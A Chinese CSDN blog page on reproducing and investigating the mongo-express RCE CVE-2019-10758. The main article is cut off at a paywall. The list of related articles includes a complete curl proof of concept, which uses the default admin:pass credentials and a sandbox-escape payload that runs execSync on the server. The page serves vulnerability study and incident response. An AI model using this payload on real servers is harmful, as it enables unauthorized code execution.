Mongo-Express RCE(CVE-2019-10758)复现排查

最新推荐文章于 2025-02-24 17:37:55 发布
最新推荐文章于 2025-02-24 17:37:55 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 渗透 应急响应 文章标签: express web安全 安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132278526
版权

目录

概述

影响版本

漏洞复现

应急排查

加固建议

参考链接

概述

Mongo-express是MongoDB数据库管理工具,类似Navicat对应Mysql的关系,其使用Node.js,Express和Bootstrap3编写的基于Web的MongoDB图形化管理界面。

漏洞问题出在lib/bson.js中的toBSON()函数中,路由 /checkValid 从外部接收输入,并调用了存在 RCE 漏洞的代码,由此存在被攻击的风险。

影响版本

mongo-express < 0.54.0

漏洞复现

1、攻击链

1. 路由 /checkValid 可以接收用户的输入,并将其作为参数调用存在漏洞的 bson.toBSON 函数
2. bson.toBSON 使用了不安全的 vm 模块来执行用户输入的代码
3. 恶意代码在执行时成功沙盒逃逸,任意代码执行

2、利用代码

(1)curl exploit

curl 'http://localhost:8081/chec
最低0.47元/天 解锁文章
mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)
negnegil的博客
09-07 4505
mongo-express mongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写 漏洞介绍 在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码 复现环境 mongo-express 0.53.0 MongoDB Version 3.4.24 漏洞环境搭建 采用github开源docker漏洞环境搭建而成 项目地址: https:/
mongo-express 远程代码执行漏洞(CVE-2019-10758
玄道的网安博客
06-20 1680
前言 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 影响版本 mongo-express, 0.54.0 之前的版本 环境搭建 cd vulhub/mongo-express/CVE-2019-10758 docker-compose up -d 环境启动后,访问http://your-ip:8081即可查看到Web页面
CVE-2019-10758mongo-express 远程代码执行漏洞复现
Beret-81的博客
06-18 767
mongo-express 远程代码执行漏洞漏洞描述漏洞环境漏洞复现 漏洞描述 mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 漏洞环境 环境搭建:https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 执行如下命令启动一个0.53.0版本的mo
MongoDB库中存在多个漏洞,可用于在Node.js服务器上实现RCE
最新发布
smellycat000的专栏
02-24 516
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士网络安全平台 OPSWAT报道称,MongoDB的库 Mongoose Object Data Modeling (ODM) 中存在两个严重漏洞,可导致攻击者在 Node.js 应用服务器尚实现远程代码执行 (RCE)Mongoose 库广泛部署于生产环境中,可将 JavaScript 对象映射到 MongoDB 文档中,使数据管理和验证更加容...
mongo-express 远程代码执行漏洞 CVE-2019-10758 漏洞复现
ADummy的博客
03-04 597
mongo-express 远程代码执行漏洞(CVE-2019-10758) by ADummy 0x00利用路线 ​ Burpsuite发包—>命令执行 0x01漏洞介绍 ​ mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 0x 02漏洞复现 ...
mongo-express 代码执行 (cve-2019-10758
weixin_48817799的博客
12-30 1329
文章目录前言一、复现过程总结 前言 名称: mongo-express 代码执行 (cve-2019-10758) 描述: mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。 提示:以下是本篇文章正文内容,下面案例可供参考 一、复现过程 1.老样子,fofa靶场http://vulfocus.fofa.so 信息提示如下 2.页面.
mongo-express-mongodb-k8s:Kubernetes配置文件,用于部署与mongodb容器通信的mongo-express容器
03-25
MongoDB是目前非常流行的一款开源、高性能、无模式的文档型数据库,而Mongo-Express则是一个基于WebMongoDB管理界面,它使得管理和操作MongoDB数据库变得更加直观和方便。在Kubernetes(K8s)这样的容器编排系统中...
mongo-express 远程代码执行漏洞复现
Tauil的博客
07-30 1309
方法没有进行检验,导致在知晓用户密码情况下可以执行js代码。js文件中定义了该页面访问路径在。同时数据包需要新增类型。打开靶场vulhub。登录网页,发送数据包。
mongo-mongo-express-k8s:一个用于MongoDB和Mongo Express的Kubernetes配置项目
02-15
Kubernetes上的Mongo 这是一个Kubernetes配置项目,用于部署和运行MongoDB和... 配置为Opaque类型的Mongo秘密配置文件,其中包含mongo-root-username和mongo-root-password kubectl apply -f deploy/mongo/secrets.y
CVE-2019-10758
03-08
CVE-2019-10758 PoC 设置 docker run -p 27017:27017 -d mongo npm install mongo-express@0.53.0 cd node_modules/mongo-express/ && node app.js cURL利用 curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw==' --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")' 脚本
mongoose-morgan:一个npm包,用于在MongoDB中保存摩根日志
02-03
猫鼬摩根 npm软件包,通过添加其他功能将摩根数据记录到MongoDB数据库中来组合和软件包。 安装 要安装此软件包,只需运行: npm install mongoose-morgan 基本用法示例 这是将mongoose-morgan与express应用程序一起使用的示例: // express var express = require('express'); var app = express(); // mongoose-morgan var morgan = require('mongoose-morgan'); // connection-data var port = process.env.port || 8080; // Logger app.use(morgan({ connectionString: 'mongodb://localhost:27017/logs-db' })); // run app.listen(port); console.log('works... ' + port); 上面的示例将在logs-db数据库内部创建名为logs
mongo-express 代码执行 (cve-2019-10758)
qq_51459600的博客
12-24 891
1.环境搭建 项目地址: vulhub/mongo-express/CVE-2019-10758 at master · vulhub/vulhub (github.com) 拉取项目: git clone https://github.com.cnpmjs.org/vulhub/vulhub.git [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-m0qN0Cum-1640341732202)(https://cdn.jsdelivr.net/gh/QJLONG/HUMME
cve-2019-10758 mongo-express rce 漏洞分析
whatday的专栏
06-14 1563
下面是对漏洞的描述: mongo-express before 0.54.0 is vulnerable to Remote Code Execution via endpoints that uses thetoBSONmethod. A misuse of thevmdependency to performexeccommands in a non-safe environment. 环境搭建 漏洞复现需要准备的环境有: MongoDB node & npm mon...
Vulhub Mongo-Express 远程代码执行漏洞复现
weixin_53696027的博客
06-06 498
关于Mongo-Express 远程代码执行漏洞复现
Node.js CVE-2017-14849漏洞复现过程
旺仔Sec&blog
04-20 1020
Vulhub 是一个专门用于学习渗透测试和网络安全的虚拟靶场平台,其中包含了大量的漏洞环境和实验场景,供安全从业者进行实践和学习。通过 Vulhub,用户可以模拟真实的漏洞环境,并通过实际操作来理解漏洞原理、利用方法以及相应的防御措施。要使用 Vulhub 靶场,你可以按照以下步骤进行操作:获取 Vulhub:你可以从 Vulhub 的官方网站(https://www.vulhub.org/)上获取 Vulhub 的镜像文件或者源代码,并根据需要进行部署。
Mongo Express 未授权访问漏洞
2301_80127209的博客
06-25 470
Mongo Express 是一个基于 Node.js 和 express 的开源的 MongoDB Web管理界面。Mongo Express存在未授权访问漏洞,攻击者可通过该漏洞获取用户信息或修改系统数据。申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。2、如非必要,禁止公网访问该系统。帮助你在面试中脱颖而出。
mongo-express 远程代码执行漏洞分析
蚁景网安学院
06-30 788
搭建调试环境,调试 CVE-2019-10758 漏洞,学习nodejs 沙箱绕过,以及nodejs 远程调试。目前网上关于该漏洞的基于docker的远程调试分析写的很泛,本文从初学者角...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值